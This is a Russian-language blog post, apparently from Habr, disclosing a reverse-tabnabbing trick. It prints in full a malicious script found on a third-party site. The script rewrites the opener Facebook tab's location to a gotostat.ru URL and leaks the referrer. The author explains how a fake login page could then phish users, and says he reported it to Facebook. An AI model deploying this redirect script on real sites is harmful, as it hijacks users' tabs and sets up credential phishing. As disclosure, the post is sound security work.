День начинался как обычно, ничего не предвещало беды… Проверяя свои подписки в Facebook, я открыл очередную ссылочку. После просмотра информации, я вернулся к табу с Facebook’ом и обнаружил, что он редиректнулся на нечто непотребное (http://XXX.gotostat.ru/go.php? куча_параметров). Я напрягся…
Проверил еще раз, но фокус больше не удался. Что-то меня глодало, проверил систему на вирусы, удалил ненужные расширения в Firefox и Chrome, но ничего подозрительного я всё же не нашел. Тогда мне пришла идея в голову почистить куки сайта, ссылку на который я открыл. И о чудо — при переходе на этот сайт из Facebook страница с Facebook опять редиректнулась и опять же на этот подозрительный gotostat.ru. Сначала я обратил внимание на то, что пост, с которого я переходил, имел пометку «sponsored», и, возможно, это Facebook так зарабатывает. Но с другой стороны было очевидно, что редиректом управляет тот самый сторонний сайт, где я удалил куки. Покопавшись в исходниках, я нашел проблему. Уж не знаю, то ли этот сайт так некрасиво зарабатывает, то ли он заражен трояном, но сайт действительно одноразово редиректил Facebook (потенциально не только его).
Раскопав исходники сайта, я нашел вот такой вот скриптик (он был минимизован, так что я его немного привел к нормальному виду):
if (parent.window.opener) { rt1846 = GetCookie1846('r1846'); if (rt1846 == null) { rref1846 = document.referrer; rref1846 = unescape(rref1846); var ExpDate = new Date(); ExpDate.setTime(ExpDate.getTime() + (12 * 60 * 60 * 1000)); SetCookie1846('r1846', '1', ExpDate, "/"); parent.window.opener.location = "http://" + Math.floor((Math.random() * 100000) + 1) + ".gotostat.ru/go.php?id=19154&adult=1&rref=" + rref1846; } } function GetCookie1846Val(offset) { var endstr = document.cookie.indexOf(";", offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie1846(name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return GetCookie1846Val(j); i = document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null; } function SetCookie1846(name, value) { var argv = SetCookie1846.arguments; var argc = SetCookie1846.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + "=" + escape(value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : ""); } Как видим, скрипт проверяет наличие parent.window.opener, а также отсутствие куки с именем r1846. Если эти условия выполняются, то следует проставление куки и редирект на упомянутый уже мной сайт. Происходит это, очевидно, потому, что Фейсбук открывает внешние ссылки, используя window.open().
И всё бы это было не так страшно (ведь в конце-концов можно точно также и сам сайт редиректнуть), но ведь люди, стоящие на темной стороне, могут создать фейковую страницу Фейсбук, и таким образом подловить ничего не подозревающего пользователя, который уверен, что после просмотра какой-нибудь «забавной картинки» возвращается обратно в закладку с Facebook’ом. Там его может поджидать, например, страница, где его попросят повторно авторизоваться или что-то в этом духе.
Перед тем, как написать этот пост, я написал репорт о проблеме с безопасностью в Facebook, но в течение 3-х часов они не удосужились даже перейти по предоставленным им ссылкам. Надеюсь, пост на Хабре ускорит устранение этой проблемы.
P.S. Я не считаю себя великим специалистом по JS, но мне лично непонятно, почему parent.window.opener.location является доступным на запись. Проверено в Chrome и Firefox. Есть у кого какие идеи? Это в явном виде разрешает спецификация или это баг в движках?
ссылка на оригинал статьи http://habrahabr.ru/post/231387/
Добавить комментарий